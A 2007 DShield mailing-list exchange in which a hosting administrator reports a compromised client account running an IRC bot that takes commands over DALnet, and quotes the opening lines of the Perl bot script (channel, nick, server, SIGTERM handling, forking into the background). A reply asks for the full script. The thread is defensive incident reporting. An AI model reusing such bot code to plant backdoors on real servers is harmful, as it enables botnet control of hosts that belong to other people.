[Dshield] Dalnet being uses as a C&C server

Charles Hamby fixer at gci.net
Wed Jun 20 01:17:06 GMT 2007


Can you send me a copy of the script?  I'd like to take a look at it.  Thanks!

-cdh

"No trees were killed in the sending of this message.  However, a large number of electrons were inconvenienced."

----- Original Message -----
From: Larry <lbrower at servermanagementsolutions.com>
Date: Tuesday, June 19, 2007 4:56 pm
Subject: [Dshield] Dalnet being uses as a C&C server
To: list at lists.dshield.org

> greetings:
> 
> I have found a compromised hosting client on one of our servers. 
> The bot
> is connecting to dalnet for C&C. Can you please assist in 
> terminating this?
> 
> >From one of the perl scripts:
> 
> root at w11 [/home/serluna/public_html]# cat
> /home/serluna/public_html/includes/.log/jancok.pl
> #!/usr/bin/perl
> 
> $chan="#JagungNet";
> $nick=$ARGV[0];
> $server="rumble.dal.net";
> 
> $SIG{TERM}={};
> exit if fork;
> 
> use IO::Socket;
> 
> 
> full script available upon request.
> 
> _________________________________________
> SANSFIRE 2007 July 25-August 2 in Washington, DC.  56 courses, SANS 
> topinstructors, and a great tools and solutions expo. Register today!
> http://www.sans.org/info/4651 (brochure code ISC)
> 


More information about the list mailing list